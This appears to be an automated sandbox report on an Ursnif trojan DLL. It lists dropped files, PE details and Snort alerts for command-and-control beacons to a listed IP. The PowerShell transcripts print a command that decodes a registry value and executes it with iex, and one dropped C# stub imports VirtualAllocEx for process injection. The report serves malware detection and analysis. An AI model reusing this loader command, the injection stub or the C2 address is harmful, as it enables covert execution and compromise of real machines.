                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2^a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......L...#Strings............#US.........#GUID... ...T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......b.........h.....s.....z...........................b.!...b...!.b.&...b.......+.....4.A.....9.......K.......S......................................."..........<Module>.ddwuzigh.dll.tjuivx.W32.ms
                                                          C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.1124345771696067
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryTak7YnqqfPN5Dlq5J:+RI+ycuZhNRakSfPNnqX
                                                          MD5:B7D8E5C3BC81D5C419A478823788E0F7
                                                          SHA1:CCF5C55CAC587EBB0C20A4FB2D615BA1746EB793
                                                          SHA-256:570747FD73BC71FF18100C1F1F58F31127BB6497396718176BDE33882C949C36
                                                          SHA-512:5B42A169F5F8A6D9EF707BFF46CFF188027473576C4FA1E0C5E1C4D214AFAB5FD92131DA1F7CF2276985A6B514511C08241BDF300B6B763E6CAF43823CF24912
                                                          Malicious:false
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...k.e.e.h.v.x.m.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...k.e.e.h.v.x.m.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):421
                                                          Entropy (8bit):5.017019370437066
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJzLHMRSRa+eNMjSSRrLypSRHq1oZ6laAkKFM+Qy:V/DTLDfuxLP9eg5rLy4uMaLXjQy
                                                          MD5:7504862525C83E379C573A3C2BB810C6
                                                          SHA1:3C7E3F89955F07E061B21107DAEF415E0D0C5F5E
                                                          SHA-256:B81B8E100611DBCEC282117135F47C781087BD95A01DC5496CAC6BE334A8B0CC
                                                          SHA-512:BC8C4EAD30E12FB619762441B9E84A4E7DF15D23782F80284378129F95FAD5A133D10C975795EEC6DA2564EC4D7F75430C45CA7113A8BFF2D1AFEE0331F13E76
                                                          Malicious:true
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tjuivx. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint yijswysfmu,uint rpdwbh);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr hkhhmwnsoyn,IntPtr xfehjdcey,uint nqamet,uint rvtfunn,uint mlrfbdrm);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):369
                                                          Entropy (8bit):5.271207229716755
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fCN5WNDJH0zxs7+AEszIwkn23fCN5W5:p37Lvkmb6KRfJB+WZEifJrFH
                                                          MD5:6CF8D7A784B60B520B01D64CFDEC3508
                                                          SHA1:CD91CFE9EF2EDA8F6411ED9A6817FD7553709484
                                                          SHA-256:9903E082EA138385CE8CA2418FD1848F422EA4391352B5B5ED57D12C69500D7B
                                                          SHA-512:4FDD957F2C27F2E0C566066310715DD6A4F70921E8140FCDC8893931E2D72DB1E79CB96AB74714250AD0735C9502B4BE767FE3FDD82CE4A14519C56F9C690BC6
                                                          Malicious:false
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.6442225461586313
                                                          Encrypted:false
                                                          SSDEEP:24:etGSrXWMOWEey8MTz7X8daP0eWQSDdWSWtJ0DtkZf6mBqO7XI+ycuZhNRakSfPNq:6bA7KMTcd6q1WPVJ6mU81ulRa39q
                                                          MD5:DE4F576253BDA1AE82659E3E111C25E6
                                                          SHA1:8A1237FCD0B3E732089509C1AA08FD31532A7564
                                                          SHA-256:599CF9AE58AA3E33D27F5A6B179DC111FCE16A907A2BA8EFEE485E483A07DD44
                                                          SHA-512:388163ABC93D673A14C861172E2BAE47078E38114660CAC4361433B8A1E7EADE57BAFEC90753C1BE5F60FDFCE7EF7A61966AF51642DF979CF8CA4A447AAA1F8A
                                                          Malicious:false
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2^a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......L...#Strings............#US.........#GUID... ...T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......b.........h.....s.....z...........................b.!...b...!.b.&...b.......+.....4.A.....9.......K.......S......................................."..........<Module>.keehvxm3.dll.tjuivx.W32.ms
                                                          C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\Documents\20211007\PowerShell_transcript.910646.NcA_PxyH.20211007013229.txt
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1189
                                                          Entropy (8bit):5.305482263812092
                                                          Encrypted:false
                                                          SSDEEP:24:BxSAs7vBZQx2DOXUWOLCHGIYBtBCWxHjeTKKjX4CIym1ZJXyOLCHGIYBtB7nxSAO:BZqvjQoORFeVxqDYB1ZQFerZZw
                                                          MD5:59590A90D28BC6CF4C8C601B8DD050B5
                                                          SHA1:683AE8715C414BA8B4FBB180D5428437C1A0C239
                                                          SHA-256:98CB74CD1B59345C836ECAFD81BF563BE36E0931F98D07D4643D2F2A01B124EF
                                                          SHA-512:DAC46930F0F98749EF7719761FD4D9A5E6E3EDF6AD16810CF6CD90164A9F08E66E8155F4583AE80D75DAC6F2C89B30C4E3142099A28B97B8C970403D5483DF9F
                                                          Malicious:false
                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211007013230..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 4588..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211007013230..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..**********************..
                                                          C:\Users\user\Documents\20211007\PowerShell_transcript.910646.uobBzu5J.20211007013230.txt
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1189
                                                          Entropy (8bit):5.308334237745025
                                                          Encrypted:false
                                                          SSDEEP:24:BxSAs7vBZQx2DOXUWOLCHGIYBtBCWWHjeTKKjX4CIym1ZJXyOLCHGIYBtBamnxS8:BZqvjQoORFeVWqDYB1ZQFeaoZZ6C
                                                          MD5:F38AD184905D39ED5F604BD58DF787FB
                                                          SHA1:DA25886901C51B476DD82D233102E94B5E61B6E2
                                                          SHA-256:CF176D0FC864490B8181A27D38241E0140ADBB22A58ACB2F4791909922E08C31
                                                          SHA-512:AB3EEB69125BAA4D4E14C89361B05C6D551F46B370919601E5C8E64D211E9FB66966664E379B90E61CA0640E738B625B03FE8B3457824ACDBC55F87A2D2F5524
                                                          Malicious:false
                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211007013230..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 3740..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211007013230..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..**********************..
                                                          \Device\ConDrv
                                                          Process:C:\Windows\System32\nslookup.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:dropped
                                                          Size (bytes):28
                                                          Entropy (8bit):4.039148671903071
                                                          Encrypted:false
                                                          SSDEEP:3:U+6QlBxAN:U+7BW
                                                          MD5:D796BA3AE0C072AA0E189083C7E8C308
                                                          SHA1:ABB1B68758B9C2BF43018A4AEAE2F2E72B626482
                                                          SHA-256:EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E
                                                          SHA-512:BF497C5ACF74DE2446834E93900E92EC021FC03A7F1D3BF7453024266349CCE39C5193E64ACBBD41E3A037473A9DB6B2499540304EAD51E002EF3B747748BF36
                                                          Malicious:false
                                                          Preview: Non-authoritative answer:...

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):6.647077324309591
                                                          TrID:
                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                          • Generic Win/DOS Executable (2004/3) 0.20%
                                                          • DOS Executable Generic (2002/1) 0.20%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:data.dll
                                                          File size:453131
                                                          MD5:b0165e4e73dad2ac1cb519ea1eab8bd6
                                                          SHA1:4ebb5db088d233d4c85b19b299613a240ce25c95
                                                          SHA256:7ff6558fd39f6d8db53aa0baa3f3a9b1edb02ea2631102b6d85eafaf4bbd702b
                                                          SHA512:0f19a2902265b9e56e8f46ffe283a2796142ab59ef42d97a957bb6327494f838d8a262b957152ad768322bca4b2c05188c386c54a5c65c77c60c3205c742ea30
                                                          SSDEEP:12288:kHlAiJHCwjXvMHk37t4Mv//IfN/YoyL8ozF0nxatQ7:kHltJHCkvH/IJvUWxata
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............g...g...g....l..g..K.8..g...9...g...9...g....0..g...9...g....4..g...g...f...9...g...9..(g...9...g...9...g...9...g..Rich.g.

                                                          File Icon

                                                          Icon Hash:74f0e4ecccdce0e4

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x10007197
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x10000000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                          Time Stamp:0x57EEB746 [Fri Sep 30 19:04:38 2016 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:6
                                                          OS Version Minor:0
                                                          File Version Major:6
                                                          File Version Minor:0
                                                          Subsystem Version Major:6
                                                          Subsystem Version Minor:0
                                                          Import Hash:3a94ffcdb86144f7d0b6d92dd3393d93

                                                          Entrypoint Preview

                                                          Instruction
                                                          push ebp
                                                          mov ebp, esp
                                                          cmp dword ptr [ebp+0Ch], 01h
                                                          jne 00007F83D8F13BC7h
                                                          call 00007F83D8F1435Bh
                                                          push dword ptr [ebp+10h]
                                                          push dword ptr [ebp+0Ch]
                                                          push dword ptr [ebp+08h]
                                                          call 00007F83D8F13A7Ah
                                                          add esp, 0Ch
                                                          pop ebp
                                                          retn 000Ch
                                                          push ebp
                                                          mov ebp, esp
                                                          push 00000000h
                                                          call dword ptr [1004F06Ch]
                                                          push dword ptr [ebp+08h]
                                                          call dword ptr [1004F068h]
                                                          push C0000409h
                                                          call dword ptr [1004F060h]
                                                          push eax
                                                          call dword ptr [1004F070h]
                                                          pop ebp
                                                          ret
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 00000324h
                                                          push 00000017h
                                                          call 00007F83D8F47B7Fh
                                                          test eax, eax
                                                          je 00007F83D8F13BC7h
                                                          push 00000002h
                                                          pop ecx
                                                          int 29h
                                                          mov dword ptr [1006CD98h], eax
                                                          mov dword ptr [1006CD94h], ecx
                                                          mov dword ptr [1006CD90h], edx
                                                          mov dword ptr [1006CD8Ch], ebx
                                                          mov dword ptr [1006CD88h], esi
                                                          mov dword ptr [1006CD84h], edi
                                                          mov word ptr [1006CDB0h], ss
                                                          mov word ptr [1006CDA4h], cs
                                                          mov word ptr [1006CD80h], ds
                                                          mov word ptr [1006CD7Ch], es
                                                          mov word ptr [1006CD78h], fs
                                                          mov word ptr [1006CD74h], gs
                                                          pushfd
                                                          pop dword ptr [1006CDA8h]
                                                          mov eax, dword ptr [ebp+00h]
                                                          mov dword ptr [1006CD9Ch], eax
                                                          mov eax, dword ptr [ebp+04h]
                                                          mov dword ptr [1006CDA0h], eax

                                                          Rich Headers

                                                          Programming Language:
                                                          • [IMP] VS2008 SP1 build 30729

                                                          Data Directories

                                                           Name | Virtual Address | Virtual Size | Is in Section
                                                           IMAGE_DIRECTORY_ENTRY_EXPORT | 0x6ae90 | 0xb0 | .rdata
                                                           IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6af40 | 0x50 | .rdata
                                                           IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x109000 | 0x440 | .rsrc
                                                           IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x10a000 | 0x2cbc | .reloc
                                                           IMAGE_DIRECTORY_ENTRY_DEBUG | 0x69140 | 0x54 | .rdata
                                                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x69198 | 0x40 | .rdata
                                                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_IAT | 0x4f000 | 0x19c | .rdata
                                                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                          Sections

                                                           Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                           .text | 0x1000 | 0x4d48c | 0x4d600 | False | 0.541116594305 | data | 6.75100933622 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                           .rdata | 0x4f000 | 0x1c8ec | 0x1ca00 | False | 0.58397584607 | data | 5.72385266985 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                           .data | 0x6c000 | 0x9b7e8 | 0xe00 | False | 0.204520089286 | data | 2.89792338491 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                           .gfids | 0x108000 | 0x228 | 0x400 | False | 0.2529296875 | data | 1.74193986935 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                           .rsrc | 0x109000 | 0x440 | 0x600 | False | 0.292317708333 | data | 2.5339353314 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                           .reloc | 0x10a000 | 0x2cbc | 0x2e00 | False | 0.777513586957 | data | 6.63564333671 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                           Name | RVA | Size | Type | Language | Country
                                                           RT_VERSION | 0x109060 | 0x3dc | data | English | United States

                                                          Imports

                                                           DLL | Import
                                                           KERNEL32.dll | TlsAlloc, LoadLibraryW, VirtualProtectEx, GetModuleHandleW, CreateSemaphoreW, GetTempPathW, WriteConsoleW, CloseHandle, CreateFileW, OutputDebugStringW, ReadConsoleW, GetEnvironmentVariableW, InitializeCriticalSection, GetModuleFileNameW, RemoveDirectoryW, DeviceIoControl, GetCurrentProcess, EnterCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, EncodePointer, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, SetLastError, RtlUnwind, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, HeapFree, HeapAlloc, GetCurrentThread, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, GetStdHandle, GetFileType, SetConsoleCtrlHandler, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, ReadFile, DecodePointer
                                                           ole32.dll | CoUninitialize, CoTaskMemAlloc, CoInitialize, CoTaskMemFree
                                                           CRYPTUI.dll | CryptUIDlgViewContext, CryptUIDlgViewCertificateW, CryptUIWizDigitalSign, CryptUIWizFreeDigitalSignContext, CryptUIWizImport, CryptUIWizExport, CryptUIDlgSelectCertificateFromStore

                                                          Exports

                                                           Name | Ordinal | Address
                                                           Bonebegin | 1 | 0x1003f370
                                                           Father | 2 | 0x1003f4d0
                                                           Ratherdesign | 3 | 0x1003f680
                                                           Scorematch | 4 | 0x1003f6f0
                                                           Silverwere | 5 | 0x1003f6d0
                                                           StoneNumeral | 6 | 0x1003f7e0

                                                          Version Infos

                                                           Description | Data
                                                           LegalCopyright | Fig Governhear suggest Corporation. All rights reserved
                                                           InternalName | Ropemother Smellclean
                                                           FileVersion | 5.6.0.165
                                                           CompanyName | Fig Governhear suggest Corporation Alsoheld
                                                           ProductName | Fig Governhear suggest Shoecould Quietfrom
                                                           ProductVersion | 5.6.0.165
                                                           FileDescription | Fig Governhear suggest Shoecould Quietfrom
                                                           OriginalFilename | Soon.dll
                                                           Translation | 0x0409 0x04b0

                                                          Possible Origin

                                                           Language of compilation system | Country where language is spoken
                                                           English | United States

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                           Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                           10/07/21-01:32:18.233038 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49776 | 80 | 192.168.2.4 | 194.147.86.221
                                                           10/07/21-01:32:19.242466 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49777 | 80 | 192.168.2.4 | 194.147.86.221
                                                           10/07/21-01:32:19.340180 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49778 | 80 | 192.168.2.4 | 194.147.86.221
                                                           10/07/21-01:32:19.340180 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49778 | 80 | 192.168.2.4 | 194.147.86.221
                                                           10/07/21-01:32:20.827048 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49779 | 80 | 192.168.2.4 | 194.147.86.221
                                                           10/07/21-01:32:20.827048 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49779 | 80 | 192.168.2.4 | 194.147.86.221
                                                           10/07/21-01:32:20.886424 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49780 | 80 | 192.168.2.4 | 194.147.86.221
                                                           10/07/21-01:32:20.886424 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49780 | 80 | 192.168.2.4 | 194.147.86.221
                                                           10/07/21-01:32:23.671129 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49781 | 80 | 192.168.2.4 | 194.147.86.221
                                                           10/07/21-01:32:23.671129 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49781 | 80 | 192.168.2.4 | 194.147.86.221
                                                           10/07/21-01:34:00.834180 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49862 | 80 | 192.168.2.4 | 194.147.86.221
                                                           10/07/21-01:34:00.834180 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49862 | 80 | 192.168.2.4 | 194.147.86.221

                                                          Network Port Distribution

                                                          TCP Packets

                                                           Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Oct 7, 2021 01:32:18.803992987 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.804039001 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.804083109 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.804105997 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.804121017 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.804163933 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.804178953 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.814856052 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.814912081 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.814981937 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815020084 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815058947 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815095901 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815103054 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815177917 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815203905 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815213919 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815237045 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815288067 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815329075 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815350056 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815393925 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815401077 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815431118 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815469980 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815483093 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815506935 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815543890 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815584898 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815602064 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815624952 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815639019 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815673113 CEST8049776194.147.86.221192.168.2.4
